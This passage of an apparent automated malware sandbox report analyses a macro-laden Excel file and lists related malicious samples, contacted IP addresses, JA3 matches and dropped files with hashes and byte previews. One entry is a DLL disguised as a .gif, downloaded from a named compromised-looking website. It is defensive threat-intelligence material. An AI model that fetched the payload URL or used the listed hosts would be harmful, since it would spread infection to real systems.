                    • 5.100.152.162
                    New Order PO#121012020_____PDF_______.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    document-1251000362.xlsmGet hashmaliciousBrowse
                    • 199.79.62.99
                    UNIFIEDLAYER-AS-1USdocuments-1819557117.xlsmGet hashmaliciousBrowse
                    • 67.222.38.97
                    documents-1819557117.xlsmGet hashmaliciousBrowse
                    • 67.222.38.97
                    PRODUCT LIST.exeGet hashmaliciousBrowse
                    • 50.116.93.102
                    SecuriteInfo.com.Artemis54F04621A697.21964.exeGet hashmaliciousBrowse
                    • 192.185.113.153
                    Purchase Order.xlsxGet hashmaliciousBrowse
                    • 162.241.94.163
                    PO.exeGet hashmaliciousBrowse
                    • 50.87.196.173
                    Purchase Order.exeGet hashmaliciousBrowse
                    • 50.87.196.120
                    GS_ PO NO.1862021.exeGet hashmaliciousBrowse
                    • 192.185.90.36
                    Offline_record_ON-035107.htmGet hashmaliciousBrowse
                    • 162.241.69.166
                    Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                    • 70.40.220.70
                    Quotation.exeGet hashmaliciousBrowse
                    • 162.241.24.122
                    RFQ_AP65425652_032421 isu-isu,pdf.exeGet hashmaliciousBrowse
                    • 162.241.244.61
                    PaymentAdvice.exeGet hashmaliciousBrowse
                    • 108.167.140.96
                    PRODUCT_INQUIRY_PO_0009044_PDF.exeGet hashmaliciousBrowse
                    • 192.185.164.148
                    PO.exeGet hashmaliciousBrowse
                    • 162.241.24.122
                    0BAdCQQVtP.exeGet hashmaliciousBrowse
                    • 74.220.199.6
                    TazxfJHRhq.exeGet hashmaliciousBrowse
                    • 192.185.48.194
                    vbc.exeGet hashmaliciousBrowse
                    • 50.87.195.61
                    PRICE_QUOTATION_RFQ_000988_PDF.exeGet hashmaliciousBrowse
                    • 192.185.164.148
                    PaymentAdvice.exeGet hashmaliciousBrowse
                    • 198.57.149.44
                    AS-26496-GO-DADDY-COM-LLCUSdocuments-1819557117.xlsmGet hashmaliciousBrowse
                    • 173.201.252.173
                    documents-1819557117.xlsmGet hashmaliciousBrowse
                    • 173.201.252.173
                    aqbieGXkIX.docGet hashmaliciousBrowse
                    • 198.71.233.104
                    SwiftMT103.xlsxGet hashmaliciousBrowse
                    • 184.168.131.241
                    IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                    • 184.168.131.241
                    Message Body.exeGet hashmaliciousBrowse
                    • 166.62.28.108
                    PO-RFQ # 097663899 pdf .exeGet hashmaliciousBrowse
                    • 184.168.131.241
                    PO45937008ADENGY.exeGet hashmaliciousBrowse
                    • 166.62.28.107
                    RFQ_AP65425652_032421 isu-isu,pdf.exeGet hashmaliciousBrowse
                    • 184.168.131.241
                    LWlcpDjYIQ.exeGet hashmaliciousBrowse
                    • 184.168.131.241
                    PaymentAdvice.exeGet hashmaliciousBrowse
                    • 184.168.131.241
                    invoice.exeGet hashmaliciousBrowse
                    • 184.168.131.241
                    PO4308.exeGet hashmaliciousBrowse
                    • 184.168.131.241
                    pumYguna1i.exeGet hashmaliciousBrowse
                    • 184.168.131.241
                    eQLPRPErea.exeGet hashmaliciousBrowse
                    • 184.168.131.241
                    vbc.exeGet hashmaliciousBrowse
                    • 107.180.43.16
                    7AJT9PNmGz.exeGet hashmaliciousBrowse
                    • 184.168.131.241
                    Revised Invoice No CU 7035.exeGet hashmaliciousBrowse
                    • 184.168.131.241
                    PaymentAdvice.exeGet hashmaliciousBrowse
                    • 184.168.131.241
                    PO7321.exeGet hashmaliciousBrowse
                    • 184.168.131.241

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    7dcce5b76c8b17472d024758970a406bdocuments-1819557117.xlsmGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    IMAGE20210406_490133692.exe.exeGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    PRESUPUESTO.xlsxGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    Documents_460000622_1464906353.xlsGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    Invoice copyt2.ppsGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    Invoice copy.pptGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    Invoice copy.pptGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    Scan emco Bautechni specification.ppsGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    PRESUPUESTO.xlsxGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    Scan emco Bautechni specification.ppsGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    Notice-039539.xlsmGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    document-1245492889.xlsGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    Notice-039539.xlsmGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    PO#070421APRIL-REV.pptGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    document-1251000362.xlsmGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    document-1251000362.xlsmGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    FARASIS.xlsxGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173
                    NEW LEMA PO 652872-21.pptGet hashmaliciousBrowse
                    • 162.251.80.27
                    • 67.222.38.97
                    • 173.201.252.173

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                    Category:dropped
                    Size (bytes):58596
                    Entropy (8bit):7.995478615012125
                    Encrypted:true
                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                    MD5:61A03D15CF62612F50B74867090DBE79
                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):893
                    Entropy (8bit):7.366016576663508
                    Encrypted:false
                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):326
                    Entropy (8bit):3.1292511123011737
                    Encrypted:false
                    SSDEEP:6:kKfAc/kwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:XTkwTJrkPlE99SNxAhUe0ht
                    MD5:040A0A8D520069C76FBE6BBAB7B6780C
                    SHA1:5B9AC4E616C20F1915918DC43D46AE7960D82BD5
                    SHA-256:1C40243699E6473E8D1B9D564D1AA36C00E72302575F8157359106A233A7CCEA
                    SHA-512:BBE42E7983E70AEE6D3367FB3F4D9AECCF5D567EB1E7C3BC5FCE1B5E79A9BF9CFB36CAB0D518A697FA87149371B32EA9AD8BBEA16FEE5096002CA4AB8B6DEED2
                    Malicious:false
                    Reputation:low
                    Preview: p...... ...........+.-..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):252
                    Entropy (8bit):3.01359045659566
                    Encrypted:false
                    SSDEEP:3:kkFklYdHlltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKVx/nliBAIdQZV7eAYLit
                    MD5:1D0BFC96DB599DC2445B3EEF6A9D7BFF
                    SHA1:E1A3F31EB78C4251A8817D21C9B406910EA467F1
                    SHA-256:485D611146F849B70CF4301B9C9C141E303D00133873A0DAC32F140B7BF4AA40
                    SHA-512:72F6D22FD67CE192B8FB63D87AA222E67E7443B112135D27FBDD3BB1E6B316C91FAD5C6C86A691DB1897B9D72F0A0A6F1A54C7F314DB2B9BA6E97A048871AFBB
                    Malicious:false
                    Reputation:low
                    Preview: p...... ....`...0..+.-..(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gif
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                    Category:downloaded
                    Size (bytes):186502
                    Entropy (8bit):6.182486294134606
                    Encrypted:false
                    SSDEEP:1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo
                    MD5:E5726F9CD266AB1E58D53B6AE7C2BD5B
                    SHA1:C3CB80D45C8953E258F5DB8359EDC1E7042F1899
                    SHA-256:71C11EEA1F3BECFDD2CF15807FACD1AA555E7EBBA9116905CDBA5DB6EB4F8F06
                    SHA-512:2CD34F6C63254E20696A5B15DB2C95F4F7E0278F840275CCB0DE92947359C2DD3FFCDDC0A6194ED25145FBA14EE7DF6B519A68FCCC2339F8E038DBE329F2C313
                    Malicious:true
                    Reputation:low
                    IE Cache URL:https://shalombaptistchapel.com/ds/0604.gif
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................Rich..........PE..d..._.p`.........." ......................................................................`.....................................................<...................................0...................................................0............................text............................... ..`.rdata..@...........................@..@.data...............................@....pdata...............~..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E29F9DF.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 364 x 139, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):8854
                    Entropy (8bit):7.949751503848125
                    Encrypted:false
                    SSDEEP:192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj
                    MD5:780FD0ABF9055E2D8FA1BAB6D4B9163E
                    SHA1:CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE
                    SHA-256:6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2
                    SHA-512:8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR...l.........E..7....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<.."#IDATx..]M.$.u.Y...V.Z!$......C.H2>.....JBR....c.2..k....'.f......qg..7O.W..0.'.bO6x...l..#!W...`h.~......Y...*+..._.x.".....#.....[........C.ISj..i..i.peOD..BT.N....IoD..qS..M{.I.D...!...[."A....GM........I.M......'T#D....&Q.H.."...Cqn"l....&.G.Mo....MI......u&.~.#k............R...<Q7%o~}.$d..L..j.<l..<...N.K.M"l.aU...G,N...v....LE..Y@.l....;n.?.Z%.&.V.....,.d".K^bM..B. ....B.l"l.a.....<...q...."K.....{.,...j.&...F.@xU......i.q..R.`u#<...........mR...j+ ..^.x...1TR..qw"l....&.a.W...}v.......S.zT..a...J.0....5... E..i"l.a%..<............lSM.a...N.........hI....."D...R.u....."Q.K.#.gM)}.L...*..b..D.y9{.kR7aA....:_..LL#......M...).{.l..O..lv...lP0l+....Y.Y.5.....j@$.C.h!qy/.D..%...g.c...D.......X..M$O.v%Z..S.%w..1"l....B'.O.I..B..}.............iL...X..3..`[.g...j..J.'...Y...rr..@m....@.uC.#......e!.4...M.a.y.......&h.o...Y.Q...@....N]6..."H.
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52523888.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):8301
                    Entropy (8bit):7.970711494690041
                    Encrypted:false
                    SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                    MD5:D8574C9CC4123EF67C8B600850BE52EE
                    SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                    SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                    SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75FB0EE9.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):557
                    Entropy (8bit):7.343009301479381
                    Encrypted:false
                    SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                    MD5:A516B6CB784827C6BDE58BC9D341C1BD
                    SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                    SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                    SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                    Malicious:false
                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A7197D6.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):848
                    Entropy (8bit):7.595467031611744
                    Encrypted:false
                    SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                    MD5:02DB1068B56D3FD907241C2F3240F849
                    SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                    SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                    SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                    Malicious:false
                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                    C:\Users\user\AppData\Local\Temp\4CCE0000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):98203
                    Entropy (8bit):7.865919311689536
                    Encrypted:false
                    SSDEEP:1536:FRo2bdyZco+SkWShnt2hawGW7qusD9Byrty30wEGttZv9xEfYW/:FRo2bMKjSYhtMGW7qfD9ByrtyOG7ZVxa
                    MD5:BE06C76B1235F5EE138D979D40791758
                    SHA1:7D1946B1BC4C394040B35843D40A4EACB9870496
                    SHA-256:00C1B7FB01DE1B6BE0E365612A9DCFEC263204BCB1CB667200C85139DA360FAB
                    SHA-512:36BFB661E9068B9ADE2173E5A43A7054FE2A74497136D72D6BC50F2485F3AC2B4E688CF35239137D42A20D492974E353F97C483B0E9FB64F91627C1EBB2F4B51
                    Malicious:false
                    Preview: .U.n.0....?..........C....I?.&..an.0.........,.\.Qo.7.pz.........7.V..^i......;.0.....Z..d../g..u....e}J...({........G+....!...~1.|.....)s....,.I...o..c...{Y.e"...Hd..;.#R..BKP^.Y.n0D..{.dM..&.x.)Qa..^...Mm...|?".....!......u.......r8.........Z..GXJ.....q9.~..'.aZ.a%.4%.......s..&.{txD. ....../?..........`.:nN6..?..XF.../>S..y[..r....F....1......!.S.E.u.h~t.n.9.....C......>...az.}@...^.....:...a;....."M....l..w..j.6/...?.......PK..........!.\lC.............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\CabDA59.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                    Category:dropped
                    Size (bytes):58596
                    Entropy (8bit):7.995478615012125
                    Encrypted:true
                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                    MD5:61A03D15CF62612F50B74867090DBE79
                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                    Malicious:false
                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                    C:\Users\user\AppData\Local\Temp\TarDA5A.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):152788
                    Entropy (8bit):6.309740459389463
                    Encrypted:false
                    SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                    MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                    SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                    SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                    SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                    Malicious:false
                    Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Apr 9 22:43:37 2021, atime=Fri Apr 9 22:43:37 2021, length=8192, window=hide
                    Category:dropped
                    Size (bytes):867
                    Entropy (8bit):4.469744699679815
                    Encrypted:false
                    SSDEEP:12:85Q1CnNn3cLgXg/XAlCPCHaXtB8XzB/RQvX+WnicvbG+bDtZ3YilMMEpxRljKbTg:85bnNna/XTd6jwYevDv3qKrNru/
                    MD5:5296DCA44913C8377046C79FC6AAC7C1
                    SHA1:E918646574DAC67E50ACD99B939E802FDBD23B22
                    SHA-256:D26BAC424C8C6088FC405F499925ECEC984D12FFFEDEE75D7FC60E83D21325D3
                    SHA-512:6C40054D1F6C2F50445C2AF26600DC44FC61BF2534D3082D391E5B1896B2B327AAEC952DE0490FD41DA631818868C6B3BBFD2A3ED4ABC7DB0A468CE08435573D
                    Malicious:false
